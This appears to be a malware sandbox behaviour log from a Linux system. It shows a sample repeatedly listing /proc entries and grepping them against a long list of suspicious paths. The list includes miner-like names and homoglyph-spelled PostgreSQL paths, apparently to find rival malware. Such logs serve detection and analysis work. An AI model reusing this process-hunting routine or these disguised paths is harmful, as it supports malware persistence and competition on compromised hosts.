/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:825
-
-
/bin/grepgrep exe2⤵PID:828
-
-
/bin/lsls -latrh /proc/202⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:830
-
-
/bin/grepgrep exe2⤵PID:833
-
-
/bin/lsls -latrh /proc/212⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/222⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:840
-
-
/bin/grepgrep exe2⤵PID:843
-
-
/bin/lsls -latrh /proc/232⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:848
-
-
/bin/lsls -latrh /proc/242⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:850
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/lsls -latrh /proc/2592⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/lsls -latrh /proc/32⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:858
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:860
-
-
/bin/grepgrep exe2⤵PID:863
-
-
/bin/lsls -latrh /proc/3402⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:865
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/lsls -latrh /proc/3432⤵PID:867
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:873
-
-
/bin/lsls -latrh /proc/3482⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:875
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/lsls -latrh /proc/3502⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:880
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/362⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:888
-
-
/bin/lsls -latrh /proc/372⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:890
-
-
/bin/grepgrep exe2⤵PID:893
-
-
/bin/lsls -latrh /proc/3722⤵PID:892
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/lsls -latrh /proc/3752⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:900
-
-
/bin/grepgrep exe2⤵PID:903
-
-
/bin/lsls -latrh /proc/3772⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:905
-
-
/bin/grepgrep exe2⤵PID:908
-
-
/bin/lsls -latrh /proc/3782⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/grepgrep exe2⤵PID:913
-
-
/bin/lsls -latrh /proc/42⤵PID:912
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/lsls -latrh /proc/4292⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:920
-
-
/bin/grepgrep exe2⤵PID:923
-
-
/bin/lsls -latrh /proc/52⤵PID:922
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:925
-
-
/bin/grepgrep exe2⤵PID:928
-
-
/bin/lsls -latrh /proc/62⤵PID:927
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep exe2⤵PID:933
-
-
/bin/lsls -latrh /proc/6652⤵PID:932
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/lsls -latrh /proc/6692⤵PID:939
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/6712⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep exe2⤵PID:954
-
-
/bin/lsls -latrh /proc/6742⤵PID:953
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:956
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/lsls -latrh /proc/6752⤵PID:959
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:963
-
-
/bin/grepgrep exe2⤵PID:967
-
-
/bin/lsls -latrh /proc/6922⤵PID:966
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:970
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/lsls -latrh /proc/6932⤵PID:972
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:977
-
-
/bin/grepgrep exe2⤵PID:980
-
-
/bin/lsls -latrh /proc/6972⤵PID:979
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/grepgrep exe2⤵PID:987
-
-
/bin/lsls -latrh /proc/6982⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:989
-
-
/bin/grepgrep exe2⤵PID:994
-
-
/bin/lsls -latrh /proc/6992⤵
- Reads runtime system information
PID:993
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:1000
-
-
/bin/lsls -latrh /proc/72⤵PID:999
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/lsls -latrh /proc/702⤵PID:1005
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/7002⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1019
-
-
/bin/lsls -latrh /proc/7022⤵PID:1018
-
-
